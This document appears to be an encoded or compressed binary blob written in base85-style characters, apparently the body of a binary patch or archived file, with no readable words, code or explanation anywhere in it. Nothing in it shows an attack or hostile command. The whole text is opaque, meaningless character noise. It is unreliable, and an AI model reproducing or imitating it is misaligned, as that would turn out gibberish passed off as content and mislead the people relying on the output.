z(xg@x{Uf8!G4e-vvACW9eQv)V{lJv&B>w?RXn*M1;+$>ry@VDc!xCD`0d;8rCj{Yb zlJ!=nb*W%UtpHiumLpA(yLBhDk_Ph$1*dX+ zAnyV`pCEF>^Yp$i23r~>?KratTMk1Iq zM&ipX9`agZuomN~xEqQ?phxLQ*Qs}158eHQryuw9lU^2$Q{^;}f@~sLv!&b$WcI&_ z?3{ig`}0Kf*g|d3Eqsh6v;iLNgXUC_#qp!HSuO3L0tAxS5F zKdA?()dAfa2RW`vnAQO}f>RtXB|eO6HSUjtY7W+%g=nYbcPv@?Cqdf}L|x_Rn#C_d z)8n`d)&gCVu9r1eN{rp8V#*4tB}4U1m!Zlih_Jv>WBNA)=@xzyoX+Z=HH7!MxQZ`V zS1_&O_A9s`>dxim1kL}1WPb(0Wp9MCFv$!q%7Di@0q9xbL)G*bw2vg)=Ek%G{LOIT zRn_!T|6QHjO^<4al9`~@C3*}b-41WQR8mnjS%Q2n<`5_d6a{&L(|hLPtE`T^lEB*v z)lIbgn#A~=s&&$kUFYnTKd2ZbxWHqm(f5G$aQqN0e2~y1=b$ri*ge@F@E`@ErRQdn zH_^q8_$DxuJAC;wpMmuIP6pKL8=x2SDbFVYGG9t{etM97WU|mqGJwjumA^;7{(T!{ ze+wavmw9J9eFK~E?qX-69^p^)K-zoI9QX#SRrCs70Y$v!b~=+XXHZ!@izyFuT4{6O zp5X{9midsc2uky8_b=#;u*x6SqB6&-1BJL9Oav`bPDb1+j5xZLO1D7mZ}|*a`ezXK z?im!FN%9Ob$$6*v15NP@z~&7PQiDwlT~k9sjEsYENB<)KA4HF_`!GiUa{frJp*P6= zJ^3R`gZeA@vqXZ~9yNcRWPtC9&rlK~VC)cJwE-N`iTTxiNS6^U^UfrgMe4&j_kBS|6uI=9#vP;Y3B;Jr67&+jS z&De-2c5T?e|)MMOo^! 
zlD1FO(_SsLZUylAp^vkut;g3qOX!E_kuJpb7|>CH@!N3CpiRKAi#q$ZeBN5 z%aWt3Ag~H?38}?gWAAQ-#5+PMh9C`16w_&``h)sX(o*$0C5OphVw?|K?TW2NfR327 z3{2<;A=mj43>P{69dR!0rz+UAnh&w6-bp)+v@h?~I3+?8SVK>VzDS1NHr&i3`9tC! zo&{S&JGZ7@qV#Sl+a$m$>%_2KQM4K!)Q5WJXp(J=;R!mMq!}!R?IUhY()3E9IhtwR zh;5p7G0YJ!LoLNX)EL2Bvr?bxtkASlzo1t@WFK~2DBj}^Zi56+8=6S9nn4CK-gxeY zAp)9GAz~-5b5QKr(`a09F+Io(1%<-!4?9fJ>Yf&XhDd2=emw&wYXP|jtpsP(%}_hC z_I(3ASyIj0HrbEZ8>d0<@w_h;A*YQ~@fReEkyGCxKY*1@{+5DQNJ4;po1Bjc_x!g= zzDaGS_$r~%DyZd4q?5gQnF`5yD}afYDe{na!L%mjDb}3Eky~T)lYRMN_9l6`AKH8i zy*U<>yrP$Bc#>Bp$t&I{udLK3Be&>u4uT*8M}~GQ!lZxynHch30oju+>O|R~P9b`g z)Ht4_A0{)Aw%5~b;y(g;r3Ro5V^xQ3G?`T~Sj;evA!LsxP%Si^=3&;5;C7po1SiGB zm5u|g%ExgFopLHbn9w1>hzdBi;yF+myk)4<)MAnXqrjHK=HiV`OuZs{A)?_J;u$e&Cet z<=oKUr5_IY9Mm0Z8Se_DV>>k0d~CC^?S*Z(4XzLDz1|f^`+RR~J7e3Q+qfc!1F3Ct zx5V`%Km>y{jE^;I)#J`{Dip)sbHrP!LuErqC?H!o%$-3r4QiR4i=LC^Hfr@`{$ip! zUPhiThXi?;h&obml&_Ak`w|K=63M~x=tO6GfP#-PKw}C8e<{V-ozJ7-T;h?k2gqxW z!lrxgK;sz6Jw7(rKaplWo<$>7PtAFx&ZX3Ols=d2J9Z0tpQZ5Jrs+ElO47E9iFp+& z2ew?Gs*dA3U2-DEo7Q7wx1JtMqCM$UC4Z>w{!J^v?_*?S}v(t4>C2FuES=Q4XN$!n|yiN6Bx?PNirf zoB@7F>R=!Y4y^sVr7xoO-@jd9nB1r2Z&dVxQom8M*!$)sN< zIX2t^8tzQw3g|Z3lHBW22nME9^20!YEdarVVnSe#KvY`PVB0F+R}Q{5Jp=*@3Ju$A00nx>{YTg&Nk zYnT?diDs+qapvP&KCX9)=BsbW9eb~L)sw3EY`9muwF;gg6!%OQw`#svwPw*{6y>M^ z5KRsOv3)38A-qH`@GP_+7{*MYBwlz#%PYYfk{3LxqZE`aLH6N)zYs5_8P@V}1^3$@ ze#uJ)i%G{h05rUI>_hKtXf!xHMmLbRnw}-Gb(vE`{Q6YDvBP0X4RN{TQzvkY?b?{O zgPb4kWtz3I>V=0Hm6JMcEqy7bp~=H=4|gBnf7&lzNDKH?_Fm%iDU+3h`$X~Q!Mubx z5S$%^mAhz;ny!5=J2QBq$J~hHY!8W#Lz`QyfH-u|#=PP%c#L8%LK!EuCZJ2L_!T*4 zkb?_$$`}SD3v?5iJ1{ae#D56TLfD2XgRH~s35n(7DxyAk1?(o1?x8WQWA}t0R`xSM z^eUuB=w=8nVH-m?|09YQs?<7if#mv`%%Eb>D>lV+c_Pgns77Q2g66i;9pIVZDoDn^jgo|JG9wC2@p)-ag6Z_R#`LI1(p2lh_&C@4&_@Syof zK4(2>-s0rY`5dFXyPi$nS=4wo>9gpV8z{4y(l=1Bny%v;$gHN~4dkz;MK@5in)D46 zuZCzVmdX+MHuUPy!m`k#z0cq>5#{vTtUpG#MG)AFS?C%gWSg${ENlfyO81z_dY{aK zbQpNi_-Kp;X5xH1a0$Q8)M(WPOhy;saWkq6uts9@P8Bx-{2!noQur7*gmL!#+=l=rkZLJP7h*E$_saQB+Ac@jjU_8)bUZ zbJdU>lJAOP*9d-j40Q6e1AreOgQeLCgN 
zrD@4{-(I{g%U4LcM!FA5{R3DgVAA}hY~wmZx3e9`_etNg=$akl8Eb8;>XFbNFnF85 ze1O^U2x~zsGZ9Rhu**#|7^U9!R%Dz9k#W*@#TUxLlTA+6$=CF&#*3`r*afJu2G(&H z%#VPl%%qD*tkXclt@vg%9C137A0>Q{!E?WBzdDUakoB8cxRcHNII+^nr#00xGB5OJ zzPHVMSbyeox12+Bqh#w4lg=dZwA+A>a9Vp{>VC?N-5C5Z(I?7uko`=T8Y6q%bF$(; zZcT!+Va`GUPHV7s$Ik)h-B#tSvzOmp*X4>y!^K-B4?|eLrT{CjZ6*hIppYztK5{1= z(I~cRLz%Oy^Q4QQq_2+FVT>`Nb?a5yqcWZg6uj8s4C49#p`GWlhfH(FvYx z&oU6sBCJ>pp523i2yq@(ut6>b%~@UUEAdYgd}h8HF85WFQ6>;TM}XpK8`QFpd0Bc^>%tO9_E-U512Ob5#G z?aSH5WXNb)RK2EvQwhB_6x(idP!gB~p2d7pp!jG#DA#rA0E$p91wlq;nm~XtTss^M zgei*;im_^f44telnpU}^a$J-_9eIgWd*8IXE^L#qO|eHYZNE#XcrmD9a=3xTsWL`S z$TY0@c@2C!!aKuvu zum=b7RvP>vr89nJKOEf-%2_<<_XxGz3FyvD_#wPSG+ND;Z9?n^dH+^YMTtVNf8@3( zUKX=r+Q}qtMq*Uo_+V!B07{dQZ*9VdSgp7R_K;@WV}B{_X$N6;NrRXMzn90Vufd}d zItwfsV8lTdo)x`4f1;hxJ)qlNiMK`fbaYdpcXPzn-xY6w)G=Exi#o_xJ(qD z68b_3qY;RK5nypWjq+$RB-WePDU>@zWbQ; z+r6;{6v$-V+OQ$0!_6_+>d?T9zmt4=DKBXjv(8iE*{IC5SucZ@=bVbPj&mxn zbk45@OjD3`KHRT-4%?g&DG!1c&*5T}Df!6}NLL@J|3^aVXYq{^_pB$zc~ystH)P_9 z@rxiiq?7&kKO$8530|c3rA6s|TVcO#gq3NFp~6joX#w6fC3e zq4Jw*SK0BrgyQoa~nI5-Vdnb3H)o9;^r8f658tzzu7h8s*M#PnYHyHf7IA zlMagzvtha$ZLTJBw$guP)2Uu^)mtvT30EKgEjMx^$G;HvejPh9I4|=2;xeQE?!vv} z6V`u*jwAi_B&E!CzPZ7N&)U7dc>rQ599$mu-6wqO+hhNHrazk$umZEr_zrw@%65=0 z)$()Tn;xf6k^CjsAYsViLURf8XPDEPSHdeKdXfM}zDaroIj4~PG0EM5FPR(J{6Lxo z3TPYbmglj2nEY+byT198U-_dSyzkdo`@|JS-p%SBmRFhLgVOtfmL~xcvPN5o44nJ5 z(&s~MIf{P|?fwARKOTwu#EO5e}U|FM3Ml^hLa@! 
z*7~kIL3%fRKyV+~`%fr~Q0>$A))(NZdKbOB+)bhmBXy7WxZ-udEumXH=c!+Na1;4} z?Z&;uMMv;# z;!4r_a2S;ztw-@_Jsb+&!w?71{EzwGN7DZo9j z3pmND~I)s^S1#i2m$=!hs5uYzKPA@?l0Nw&EKU7v0;{hw)DwkJAh}_Varbj&$^Ms9XSkaIJHPPu2q~8EL`~@Vd&QP_3T9S z+Cfc`@ScnpF17xir3FL8ta4l*T}Qr-|&gg~|m;>bB9y1E$+UmvFU<+_d zRiWQzd0Ud@?rIQs*qddPRNJya7d;eWRrhL!zz|@I#jK9yGk}yC#)M}7oR*;34o}EtYTtSd7=-;rx zD7&w_sJw4Bd33~b$^iZYW$jF^_YwCMfE!?NWSv}$SBv`jSUnQc!@y0v$Knk9)9AVa zRl=tWdbIv$tp7;*`ZOFtZcOLaVBTdxt8$g>R^WC_AH~@V((bwGv@$Ex`f9-J^mg8= zp&u7uF)`W=G0XBQJ4nKyC%O2GbY^WDBlCk;zaPsO9&Z)+k4m~fdFhD)kId+Tn+^Kg z>#9U-x{lOdP_OrPJ-?lI47Ntbo|)_-)#1t1N&$g@3X4gF7p1< zQb%Mn84s^@!onREfKtZ`AGKpJSTIV=0$Yif5o9Us(T4sqss*bw`NrH{Vr2^2hU{UXETs!BK>g2e<1_A{p&^bM$x=pY<#C^O`o2M3Zd@lqZFSe{S6bI#4Q^J zR0nuIjd7=CEu8y})2R0nyjX1KEu{%d@-W{osfC-m_dL4Qj!F;OqVp`}pCb8d0?|_h zt_$F0F)(h3=y^yO79qNoR;gR4Q*5`@QVN#LT1sk31F-+QV8D!)%mHZ7(yp7cJLoSt zSSp?QD90W(d$qqS)vGcUsL;)-GgH}RDWI;P)f(TVbjZ!)yz%-3jRxVaf;>zgz5})~ zhj~Ag(W#QZO-GfF_D2rwtLc3Z5QTt0MxJYAUR^?bCh5^ws0Eb`fYwQPc(ua=wZYGN zgTvv07uuOUA;2hzcEC0!hLQs4jN)=MIvMq!G3L>B2QH;)OO~;C161AZmR$~)eZ)!S zbQFFZ=w||5FaN==q%~@qg!4Hn0N{sSu=3N9FH5LElaClIw%dMu z!z{B+*EqCvU=QQNagfetrI*|UsV-RJ+OFsrKXKe(@l&fkKM1EJ_Rx*M$-K3g68?3% zz}^$uJgU2Xg202|LEVKxf2j^H)B1c(m+3TAOAo3o{%Tw!W9u)5eHS>g{*d8Ak=4-f z;F+j`ygL{XT|rQn0wZ*PuLJbc3y2z_*R?uTmR{p%g1%PQ%BGdNAJ)7z>9@C8wewy) z*~NWu3y?Gq2Hpl(fV!ZP2NHWH#ONR=9gIVx92HBz+Rz{KN|sVt*t`eZcKO_Dv7@ow zWKT**3=!L1j&@K>YVB^&W#nE;gO`$7G6%alT25h+2}_NBS;txS2Fvpm z;=k^&dg8gRI?vUwdEP4)s8jCcuKGJhmAM`=lYBf8v*ZIf@M>~T1Y=XVla%_B%~EOB zfI9M!++Ztdxl+gGUf29dyT1jJE>%qqqRUN6KZaLpA9teN)f8L8;@bnM~qi2j+5Awdu4_Eo-P9^V90MRn~cI93LzNJ&@eUtgKsZC?(+@{PU z&~Gr~Z&B_~&{_Ibccb-Cp*mT z3`S&z5AHTyQMcO_^khfQ8Er;2jCMyIWhdnYmRM!s`n}zYQk;@5`~F<#FOhja%FXdW zI5C9*3a8L|5PyIPSr)G-ol__UM0Ax=fdfYbNDOc$XK%RfZpwMUpV|@8njOz>m<}M|@BuH-T zZ8ON&cdOH|!#--dj4)4kOcJ!?hMl#?EhT@+k>Z_9I|#7ZR(la@E4P*(#bGP@Zf)%N zLzVYpM*TLUv40t2g?=StUd@<;yu;ZDeog6RY4=xY z^wzd=yR=GQnZ^tQv6COikPTRWnu-6O;U8I7M_8fMIXQD)F7OS=42It26#XsZ{5=DN 
z=I*q*56=D=+{(W=^shqk^n7`Ue<*ah3zGnz8r_uT?6qO)Cn2CARn3C&MKgvZtM zZK40uQ2i`rRb2UG${?4xUAO5)dK=?nX6+Bv?JrsVR#q2a=lok}-hrQNNu@&VHL>?% zR=td1q41Tgc{OYP8p^dH-h^U%Dx944G}#U)9dG|3>p-R|{4MnU52Y&}0_78i+UOvd z%noH${zqtjwc&fm`grFyDAf%J0eVo5e_cEUQusC~5sCPSl@f{m(4M&e1j~ zY`q>CZJV8n30rlq`D5Zca4(uhE{55DE__&qJHud~asXUUa(6Zd$&#f6Jzzu;$}C~^ z4BZL9XLYCo!1s}Xmu)JmG6u3_1j7@&^(hVUYD5|HiexEW2YIf3a1$D^d0Z=uY;Bn# zYH$`XUc)f2bJU2`@J`HV_!uKLIv6>%RSybqz4vG}Dl^uMF%X6PVWzW$`%T?m*N)@O zID4H3ee}jH#968xEjj2&P=NH$DFsOiJXbA&z2?bWkwXN3BH$M#apAKC=14bYz*ND* z9)KDI@yK}GpirC6UTPQ8+GG~a0D7P}qY)j=arf&4{i+)q;`@N3w~N`!37&1`6V(ZD zljrb6wFGV~7&;k3RGC=(}6)E}gL)W&$}zjdei9%mg#h z@5*KpwYHsau~RQhyV>5m|is>9UbdU@LYGL=;N zxTMnV=P>)o{}5(KZcT5c^}k77oz%RHnzy3n+o0wP&(lzu#v&qN_VF@OJ3)kizbB`#`6ucV%!$DXme!|H z2&g4sVW0_w1p!VBmPokcD6U6}nQ&!^aV(=Dj)L(S#2}6u{8EjRf^gzJkcsZkud+;!I$^N`nfoLee7Hw z!}a9-D0N+IeEIX3?~m03v2UWs=rFzBI1ncKSKJGcuJt2jMgVDZsQtum}5(X*!6XuEcb;2KShIcjK2hweW2BcT4VpQHXmvAi3WeXD^M@` z=~twC6>uBNAQ3J4Pua^L{}03qjw%1v!55nM>E(}qcFg-uKYu*Te6HOupg`(}m9mNf zP&5TQtewy^^%~#%z3;-gD(Z#{<2Hy6+cQBZ+jQ2+q#+;$SWLsa$$=oPZ*kO5Vd;cq z>F8WNOb$g%afdUz$vVBe{*Pxq@^vlV|C{4~p>bzqRFjZB+Q$!JGPhKXvAdebSmLDkmqs+v$l`lboBC@5d6mN$sDKsZKpY4PQ<$9EGi@Y}-6QXbaD@5Q(<{cH&D(+y?*-Fq8CiSgr|rEuGz z!V9n+jxCKXyC5&-z1C;tg(e8UN#N8aWtEK#Y-PT}ID?-u!nom8*&yp3i~+lhLj-HG z_G^Gd#~BDSh_iqPF-8%dG-K<^T36mGVR$fMOAGkVWW%E2?(?QxL1V?dgB#rX9$3Ww z$zqMJAErxCfNC`S^>Xk(a0dbFHu0&jwx&HtrP8SJL$yuTf2eZ9<()Ft+$`#8IUv3y@7c$1)eZ0}Ub?Q^s&C+5Wm2 zsOFUfcaYiKjB7MH9K@j?FsMTT(uf0m=v(kE3WD8H%I?_-f3<=Ib*IFz*+g;#_&`%a_w_t*phvEDV+)d!w3e3uv#^W<<>0y43 zAQcTx_EVDmf@JR{`_rqBPi8T1LPI?owzED$qlVbp8=U$%yX)OrzMuQvd~C}Jx|%z> zdDKuCEoNie0oQVLdvd)EuD23zn3x-!=to57Q1&A7&mq1BF8j78ivM8w7)2*Zb&U+) zCiM=b^U)Q``$9RND?p-t7MQMkI_e*diXK+_V-*f}N5F>zKL2>#y^8`5D-v-5qJ#f< z_1?CL+Vev9?H z80>nTwUR*r>>v#u%CHw1lMpnfWwyKcf?oP>>xzBNh(`e*gfDCX_lkg4BscXziD=z2A}ZPW;K`}Wwj7JotN}LaS?b$t zTiz_?ZF0j-%3LOGl6TxN@?(&!({%KnN}BRHxFy~S&rv8P~!MR(B~2x*9I<%^Mxif@BlVyl1T=@Oh_-VjWIrFQ7c(cPnJP}d61 
zozYFB3OFAkR{8aQ@Tu0Hp>7s>0xNXFb3AfdI{zT##=%E(CAeL_>$Bk5Srwu)y7?8oYhE|w9qxsV7=7F=~C4-O_rhJ ze0&-e6so{gJ>$6^TkZPyO)NI8$V=q7!*8vZ@&2z}^7h-rd* zcAe8o$JrPh4QC&TF=DxN6Jh`~@MSQghv;dHRj}kq57Kxs?>QE41uXzovv9tF+iPu9 z(F*g2TVbz*?G&nS%J(w~F!KvvKIZ!=l*&y=D3E(tvMdcnJmXZP?=%(r6qdmJ;< zeCe1koYaA3KR&|zjOBgsSCYlxRhEBcy|sDD$fpsOOdMRD4pxQo2JIf{uCU(gCn@JM z9kj!kcn-@W^nUJdV)a5?KO?ul{s-xnpeU86EZJ0+pRvmcGz-Da&c)REMnNpX;vaGq zfcN+Ugls?)!9=!CvsYuh(-m4h8S#}S^AiJ99(*nRI5|xfl`dmJ5l{ez%nJV`2P!qE z7o=}+o!_L2Xowoi3?50b$yxQS4vq_}V|)y`SJxWhQ)4W0^<@-a6Pvkar|_ek`6Q?Q znv-p>Ke-R8i+?3mUucRpMNB88e0bWEk2kgy$MSq_|oNC+rno)i%liC zHg6sQ#HvmD8EugI;kMAv53_15`tvK%e%R^}9iW1ZV+#Y1lh zoEUCY=BG+E+5Dn=vvO@#{#lv#l$;`0YaF$~3My&oy69beO{u?T)hAi5gK)W8V`ORU zuh+T;97fUKvhox7%R&9F@a>!_&41PQV$prIMU_OM(ozwg4PSq&w*6CQj*d@9vl1W|vs%&7+XF*{@QI5U;cATJj-1%n2xbY!4SGzfwB4A9G`y041`hmACz_dpYafgHw2>CR` ziouaBpUFK#&P+X}3@8fRg=^BaaZMel0KQv)E;Z#F=e8hNlXA^DOuN>1Pj@$+K+TyWt%z@+8xSok}!s|3ijxo9oNe{(# zI5sF=)C1DEmd@`L@zis)P|U;6b*wB|7H6^up27l2c9|WMuBaMo=v9bu!<>e9cAy)x zoIeo?@EN7(>=N7>PR4^-oSz2B2O1|-X;5MaZ3zFdv%c>R=B$klVCNWpASk|*jazb& zOkt6j$Zo0Xdk7@Ap0AYFQK!yj^}?!_QK8o{Cxw6&xke6kZer@ua9 zIYSJ8CWHuH6!ZQRijT`pWw4YO-ak-0v1Hk&CH40boX=reK&4oZ4VTO8ORS1ci0S&z zviI|nT&m=qaMh#JYI?7(V|_gU88ClVf2@uFRI9lqnfvm0wd#(F-YKlZlk+R_1r^Qh z)hDM_?2|!Z8p;yh4Ov|$<&#prDCHpUUsC?lns)7UWA&SodZ7dm8>SxUqo^wGy<1Z2 zO8hJYB*4U=M$jBs|Ap1#W&L#71<^pL=G$ett{mPB^uy*4X%Zg9c=ghXb5#XE(*(a0 z(cQ@tNDcPM2er;;wJ@oqquw%EYkxJtxi!w2H4rP=|0~H)pegfrl$ z3Zgws4hOwPrWh|v)N-;KJE$Qi12k*g^PssvMA zS}V`14QjABRGVxEF>%Ads+3ZfLk^d?C zJE)t=^42oiD`^S$Ukvp!e5$OTExWgu<&$L$&Z+XOvV5Wz#QKoc(Zp@|AH8A#+VP=7j zX&NDi4+kjU1|kBl9e?4$3!22dhGSF593ZZ#uL0t(9xkPxEY)LZ)OnZH0X~Z`fhIwn z&)b>QfF=px+v@2pF%jopN^=4+|GN>Ei-khdEN+0qyT{`syp*8K1P^3WcV_v8toaT6 zl~N_hrBx^a25L<5nTY(%aH9>^{x0BIID=Y$Ouze^h>@P(09ZOqHz)fH7IUj-+86FV z%Yi*(_@=G*&aoTBPS3NhNbPC_C9&FeQJfH^#NICT;7^$`IVa}tBVNGUJ+&|hR(0i= zwzm<)qq)w?`+oPaShaP2ck)RJJF)JWEka)W79TeVw1(FlN^lQRM*&>gZKpO{iZ$d{ zD+XkezHRGO&x>rGx|2eX1CJ)mrw~C*mU4Xw&;*og!3qSE&;K*kd6hK?iXU|b-3?DH 
zE~{EqcEPRvNM)T0T$??U^$-jM&sKg_d#~s*uyBIJDmWx@$*vy)0gc{^NBu4a&Bon4 z)@6utaO+NGu=Z6fvBFxl&9V9k%61mnyG~30UIEIFe4E>?ekvZ2Kb61vZ+CRtn|r%!4*6p z;puc2hqpslmjx&9q4;(=U0Y}r_kwuTIWeyM##guwc9grMce@M`e|0?wfL)L-`z}~g zukLs?B17}1lfQ!ewoH9ij_j+@3rU6cW}viP3~U<@VCJH3;ATfTqx4vKZa|OqLK~Zf zm_@u9bR&Wtj!f`XyGU03ne$@)3aWD}KV$I)7GJ?C1XgPRG?s))K>I+u-=N&pY6Q*- z>1H@~7Te$#pH^k4E?|A=3slPnv-w-brGBt%O=8J_RsDPh%m=4tA+XY+OZX1QQ+Arn zQ#?2&EU=J)<;nn058e46fZCb=mXsYA^<8diM&O?^}(gdk9aLqP8jhP=tJPV z1;0SGkXr^Vqf~Mc{s7RscM)ZQAYHaT&+ABDZ}Xh2r?`_-Hc!B0!D*DefP4>p?x!2% z|4cRiE?uW1x+;0lm3;Wu2xHU%7G?mN1ZL@B>A$cPc03ck#rtt5H5I;vJKv>Hn6nYA;u{JY4gKY;_;MXw@2D=FEa<`JnyD$zRDk%$BW;o=K zhY;4-8yjzhTvDNR`2aO<%i36=Fq46d3+TrtLpkEy>~gl0s@;lTrAoG83cpT`Q{Xln z!tn{i=NcPhltWzGHzE2g#q5hAo#21$!0du1y_PW_xR`#Fb5F8+3+L`)*E#_f{he}_ zh#$^dz*gcyb`sm5%!mX+h+R&8E14N*Bwn0>ogU>S$#7CN-;^O-Z>#e@Q{SVe!midR zUc;B=TS~nNa}?$SA~3u{Sk7!PkAVS2>*sNVn&vr`3NNAPYT&8;&3${KZtsC&VA0L- z)uvSRO-$sB<*=B%8ANVPg*zieHca086BpBo2tM3>C5!FKW;DoH0EyI!e%98YeMtIF z1`FZ&r3_Xi%an2+DDq{bCea8R)Z%wnL#kY{ds9WW7rY5#spTvwc_tb#w=AE6<=NNS z^}eoHpi78Fn91PTO<3rsV3+KTk388L5mMNe^AR(V8Ni=(Ia9h`!tc7C<#H*PNv8=a z{?FaaZE)5P&~ljCFvP$M7*i=ML^TjuQSza1!38D=~Bo>9&(vmXO%<5YZ6(+HD2l3gPw+vScNTZ-F8zFm5ECG6&{~J?Dw}a9M$i zMO)P}fh-%~uTqDaEL;eTeF%J=_k55L+=l?ONHxP#IuALz2-K$6z#d~J*}2gMAL*h~ z2M;rh$Ezg9<1v#bi-l9_!7^)~fs->1K(&7ic_7{y)pM|EJ%J7Y2R#KN&WG8=im7QR z$d)s>2t9;}8}>Jtbkj&seQ1bWsrW_(2dW7UsdZ+#0WTBuW_97R7m-{{;a&auJaH9?E6a z^#FyXZ{ch4JCw>G-#VU#Rbp@gk5kMPPmV;kF&6kmv+agvJ09Ec1tqc1wJesS#u?Be zn-Ned1Y>34&1v9{>|#h+Gg1f(f?fE?t_mKFL^P!aM!A#f061t(+tMtt4^CNWL6Be4Oz7xG)&eIs>+Vi9a0>mWRI*%rl?WdL0Ws}B0w=ek7o zY2^zD>k4t)G^5e3LL7)i<>U2n`Qz1b-xsS?`EOGHKeFBf&Wh^%|DSWtoar;Sx9uHv zSzzhSAU41Xim@abu%Yrz6tTn@G+0oBD43Yo#froj!7gePjV;F5V$|4UP3*k|_4hur z%i{m_f9-4L-aB{i%$YOiJm)E&=ksh-^z}E&{uZz%iUy;x;Eda>xZ$GX;a4R(4D*TP zMkb9d7IVrE#hU&snh$YQkqLgQ{y@kN0q=hxy12|tdxn^qnbFB+&n(Qy&Fq}|9%Rg^Cq3`(5#K3PRa#YM5Hp81K(=D7FPZAuvT^P_H zM#&2T;v)PP&xsBXYN*Vk!u}hiV%} z?;v;dB+0ZkPS+je_8yzwp|}lz$sOceQl}#Ek(>Y4Y4?I4KVKez3uS-#V?%M~*kv-* 
zTrk36lEp!)rWO9-l`r+kX~|#7N-kc|qon&!ogXK@ak5L?U~D97k+xfG#=k?lnbC;; z>zCgrS;-6+jEI|b-&);B_yr^zibw+P2dkk&-0UV;k>y)lak|T-IL*bfP7*JAPuZWF zz!x|2wVF^C-+9@Se6f^OfJ~C*$~!|z_A3;5I^JSL{oPLdfFsWKv*-BXi>$DR%lt39 zHVu+bSPm`gGfAR-A}^HirZnMvds2vAGDh~1`^x_#*~j4!Y#savlZeoLMs$+SU=!Md zPRHwXv(7fS(~4}{vf(6RtmD#8UwvXcTXN3@wynaQl5#Avc`_;|<_g7Z;X+X^ml~^m zm1F9r*F;0Hz9ZE$GmR5lvdyAxSSzdu=@xdx?V>B&$pAq3oF)-IS&||T{84wgM|V%h zb+QZaq-;-MT^Y6l&>;;*24B#G+~>Z214`wBY$)d*^3{WWS1@#gAKdL{Z!zmbzoHDa z7u_(F02Q()C6oG5N+dHKQ+5{=-mFNk6f;Qfl6~uCV}q7t)5$5-kl`%u2($Nv0T?BWasssP_}TY; zN_lL$rxnCG5ZZEgRF-i(K}bAE8tj$t!J@(=v%FyWno8Y#n&II5s~L5pk?PvNGdbc|!I0V~?%>`IbD;pnC=n zw3%&O&r*JEM@@xvPqI9bhmwClaEJ5{p?3vcE@qCJu{yvhCMMSHZT`2RJLnm1otJdm z`VHc~_3wxNd!Z-GZwAD5zlfRF_P37sU+jMi7$)~E&>1qTSb11MlWoe4J(LO||4nRL zoifoT(u9gtcEpL9`cuG~BGS?I;uA?5%`HiS4`MU28q2vyV)eJU`Keg_gA~%fhbapZ zBmVRJmV8~pFD7CMKOcNU4Nyknl=Z|F8P>&nGjM`Pu{JRa-CY^|M&x{q@gnYt(5LT< z8jUm1X^a{Z@lLc^js8%)z(3W{zqCDMr6<>xv#%uLRFw(_vVtZqKQQNSMtG)09-HhL55c}^;v3Wp zS??o!_+~ioBMnFoU2PY<>qzWN@yDwLf(0p3bdHg$Z5r}{aCaip&<(xq-TMU4i*1qQaGm{GvU``XzL(Ks zD6(LUKw<#|B({%Z8|;EFEBahgDBWX&dVkBP90t)0oSe;UOF9T zwSjz2oehkp(7!@g%?b_R!>rH&#R>SYNv&a9r*&tJ3@x4r$cS4r;f9QpNs8ZF+2@$w zHIpzyF54vLqoK;TwN%CTEGNmR7K1i>I^Y|cpnsG zsTg|R8-;$^Hmu(B{}3~+SeIjQa@ILL8w^7cmPgu!UvfL(atb6rO_G)08gbMwif<(9 zWLb0V1LQ*auyhwX&FT(JIBGoOLBkttK!PZZJoFwy;!uXM5oGa+>xKf+)eAIjMz)+; zEs99BTnEN5QQ!*QVO%k<88v35DB@YL4t!RmQbkNAxRIGU$$W~NcC?->^kfZ7gVW|< zX_i%mDoJ@N6^XS4X6&N{v1WR3sjJuTt2XS*s)l!iu+Cc6Xy*^p#rix0KYpl?p_WB3 zvRI@ za7jE}sXAo&U0k7Ecap9rt}dJVxUN#*nZUt}ZGdYvB5VWeX|j3g{ztlgHp_8js*#|^ za4|sx!|TA_<;1A-p9%E&UQlia4ofe$5Bn@oDQfPtO-PSSv(Bqlao^CRFPj!DsUj+I zI51o64k2nmbPmj+LZ;ajg<8#q@s43iL)#*aHqeU-L<&u`kJi+FSV^xYtUTPs}>V8aPd`> zAk(S30ya?DtWupg+7w|OV0jZva1Evs*06LC8=VfXVr6KyJ7mqmn?NvO)3F#2wvb^K^ILW?&$Hl`O2|w9NHTSeu#3cMC8?CqL>G6ljD+yYSKJOfM;VqZ8nSRV zybM1+JhA3KEUfpjGP6Zrb~OZ}Jh>G%1&`Z<5j z#9+d`!a7wp;IH=+W>v{#ql#C;;NLJe7<9Ii&kfFrlhQds^%}X@Xm4}qetvBhrE>uy zVCCH`KM)Pp{0R$6hj!C5r;CZsgclXuyUk<0;n`2QZTjIWyXIx-8}t4H-sAOvaE65D 
zpw2^?c{6Zcg8()OwjS4bLT~^{-X?BDGy`9N@}P;D%m4%AjwO`g)40u_TnfkuJ(dbVF_^T?u zBRDXmek5@IM&X$NDSJ}A=HUnicNTHaaSsdzaeL)J$A6Y z9TsJy)~ML&lI^zGKVU3rmYbvl*vg-U=s4XBNuulM386!rp0s*Kf}{6$_f0^&V#DKzk%wgW0}ffh`IhAJU0$hPceUqq zn|~q&1VDcz9pZW&09x3U-{y^17BUx474;iRFJr|)ZGTwUfcOc9Mu4MRGrVgdtF+az zC(2xx9y3Db!nidSv6~Zqjg+$f_42YbmVKGRx9T`s>ml}NlJHE%*`+49sTG7=uA%fS zGwwFsmLv)@ZLJBy`04%&mA(vHOXa}%%Y-4OU|S&;*M51OAdR>tuO<#ySZuB#|*}G1|X^#)^Mm<( z{~xdVnio8=*~j}Siic&Py5oY9_y;|Le{i>`A#C&r0~|Iu-oqhM)7J?+=Y2udFGf{t zOqA#jl<4{6ttGJ4pwqZah6dxcPG`X`=`6UHpOT?^Ka-)^n*Xz7%13t|qmTZx7!q{V z#rwVJlZenV{irFaLl?c=JKezRv?Tje)}~vcqnp#7?)%TlOon#gWaMWWrlGKP>BK z_Wy*MO_El@`Li$tR6oP3(8*o@8NE-`)G%my@@TO%k^9|^P~`k#I-~u)G86Ixv-ecL zxZV?YdhRox|HyuT??2hgm}KHXQ(GW<)I(@&5*fQ1W1>NBWme_^za>L9KNyOfx87(f zqu3hevcPSU9&HmVD8K=%&Lr2*Xg5B$^xE;nwh7tvU88lWU;T$Cp7z|2JpDB?(GatU z&-XAolpSL_?C*;ib>Z*+rB!)Z5bc^i>IahjpBkIsVTNW7!k-dCAn;*GTF z?|PYda0xpFjH7XOPZbPh(ZmRZV1VTeo2p-sw2@uTf{lSHoG5HJ!RJΠHcAY${9) zQ+EoF|487Noj;bAXIu7W_46inOsGw)ruP_gkN%92>0Py0AN%0-1r6X+a?9}pL^!&+(>-92N8(P_aCSC@85(vZX$Z* 